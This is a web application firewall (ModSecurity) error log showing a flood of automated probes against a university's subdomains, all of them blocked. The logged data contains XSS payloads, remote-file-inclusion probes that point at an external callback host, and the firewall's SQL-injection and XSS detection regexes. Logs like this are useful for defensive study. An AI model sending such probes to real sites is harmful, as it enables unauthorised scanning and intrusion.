[Tue Aug 29 11:51:55.827772 2023] [:error] [pid 2534] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:table. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:table: event</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO15a8Co-f0AAAnmT4wAAAAd"]
[Tue Aug 29 11:51:55.861417 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:message. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:message: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15a8Co-f0AAAn958QAAAAD"]
[Tue Aug 29 11:51:55.941003 2023] [:error] [pid 2526] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:table. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:table: event</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO15a8Co-f0AAAnepQgAAAAK"]
[Tue Aug 29 11:51:55.965293 2023] [:error] [pid 2440] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:message. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:message: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15a8Co-f0AAAmIbTcAAAAo"]
[Tue Aug 29 11:51:55.985544 2023] [:error] [pid 2526] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:message. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:message: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15a8Co-f0AAAnepQkAAAAK"]
[Tue Aug 29 11:51:56.544685 2023] [:error] [pid 2534] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:location. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )//\\x0a found within ARGS:location: \\x0djavascript:alert(1)//\\x0aaaaaa"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/rails/actions"] [unique_id "ZO15bMCo-f0AAAnmT44AAAAd"]
[Tue Aug 29 11:51:56.545374 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:location. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )//\\x0a found within ARGS:location: \\x0djavascript:alert(1)//\\x0aaaaaa"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/rails/actions"] [unique_id "ZO15bMCo-f0AAAnn1@8AAAAe"]
[Tue Aug 29 11:51:56.564930 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:location. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )//\\x0a found within ARGS:location: \\x0djavascript:alert(1)//\\x0aaaaaa"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/rails/actions"] [unique_id "ZO15bMCo-f0AAAnkwc4AAAAY"]
[Tue Aug 29 11:51:56.591651 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:location. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )//\\x0a found within ARGS:location: \\x0djavascript:alert(1)//\\x0aaaaaa"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/rails/actions"] [unique_id "ZO15bMCo-f0AAAfWOJoAAAAL"]
[Tue Aug 29 11:51:56.594490 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:location. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )//\\x0a found within ARGS:location: \\x0djavascript:alert(1)//\\x0aaaaaa"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/rails/actions"] [unique_id "ZO15bMCo-f0AAAni@88AAAAU"]
[Tue Aug 29 11:51:56.599859 2023] [:error] [pid 2529] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:table. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:table: event</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO15bMCo-f0AAAnh6OEAAAAS"]
[Tue Aug 29 11:51:57.542343 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:location. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )//\\x0a found within ARGS:location: \\x0djavascript:alert(1)//\\x0aaaaaa"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/rails/actions"] [unique_id "ZO15bcCo-f0AAAni@9AAAAAU"]
[Tue Aug 29 11:51:57.568222 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22\\x22></ found within ARGS:id: \\x22\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/zimbra/h/search"] [unique_id "ZO15bcCo-f0AAAnIlmAAAAAV"]
[Tue Aug 29 11:51:57.594909 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22\\x22></ found within ARGS:id: \\x22\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/zimbra/h/search"] [unique_id "ZO15bcCo-f0AAAnEqUQAAAAO"]
[Tue Aug 29 11:51:57.598616 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22\\x22></ found within ARGS:id: \\x22\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/zimbra/h/search"] [unique_id "ZO15bcCo-f0AAAnd3CkAAAAI"]
[Tue Aug 29 11:51:57.625035 2023] [:error] [pid 2502] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22\\x22></ found within ARGS:id: \\x22\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/zimbra/h/search"] [unique_id "ZO15bcCo-f0AAAnGkMcAAAAR"]
[Tue Aug 29 11:51:57.636012 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22\\x22></ found within ARGS:id: \\x22\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/zimbra/h/search"] [unique_id "ZO15bcCo-f0AAAm7nEYAAAAE"]
[Tue Aug 29 11:51:58.565209 2023] [:error] [pid 2538] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:cyclePeriod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:cyclePeriod: alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "journal.unla.ac.id"] [uri "/plugins/servlet/Wallboard/"] [unique_id "ZO15bsCo-f0AAAnqj98AAAAC"]
[Tue Aug 29 11:51:58.566911 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:cyclePeriod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:cyclePeriod: alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/plugins/servlet/Wallboard/"] [unique_id "ZO15bsCo-f0AAAn40xoAAAAW"]
[Tue Aug 29 11:51:58.574560 2023] [:error] [pid 2529] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:cyclePeriod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:cyclePeriod: alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/plugins/servlet/Wallboard/"] [unique_id "ZO15bsCo-f0AAAnh6OQAAAAS"]
[Tue Aug 29 11:51:58.577179 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:cyclePeriod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:cyclePeriod: alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plugins/servlet/Wallboard/"] [unique_id "ZO15bsCo-f0AAAfWOJ0AAAAL"]
[Tue Aug 29 11:51:58.649637 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:cyclePeriod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:cyclePeriod: alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/plugins/servlet/Wallboard/"] [unique_id "ZO15bsCo-f0AAAnEqUcAAAAO"]
[Tue Aug 29 11:51:59.019092 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22\\x22></ found within ARGS:id: \\x22\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/zimbra/h/search"] [unique_id "ZO15b8Co-f0AAAlUln0AAAA0"]
[Tue Aug 29 11:51:59.546079 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date-from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:date-from: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/e-search/tmpl/date_select.php"] [unique_id "ZO15b8Co-f0AAAjdQYsAAAAZ"]
[Tue Aug 29 11:51:59.570970 2023] [:error] [pid 2528] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date-from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:date-from: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/e-search/tmpl/date_select.php"] [unique_id "ZO15b8Co-f0AAAngCW8AAAAP"]
[Tue Aug 29 11:51:59.571392 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date-from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:date-from: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/e-search/tmpl/date_select.php"] [unique_id "ZO15b8Co-f0AAAnd3C4AAAAI"]
[Tue Aug 29 11:51:59.572691 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://www.interact.sh found within TX:1: www.interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/echo-server.html"] [unique_id "ZO15b8Co-f0AAAnEqUsAAAAO"]
[Tue Aug 29 11:51:59.573322 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://www.interact.sh found within TX:1: www.interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/echo-server.html"] [unique_id "ZO15b8Co-f0AAAjdQYwAAAAZ"]
[Tue Aug 29 11:51:59.573385 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://www.interact.sh found within TX:1: www.interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/echo-server.html"] [unique_id "ZO15b8Co-f0AAAnkwdUAAAAY"]
[Tue Aug 29 11:51:59.573489 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date-from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:date-from: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/e-search/tmpl/date_select.php"] [unique_id "ZO15b8Co-f0AAAn0GZUAAAAa"]
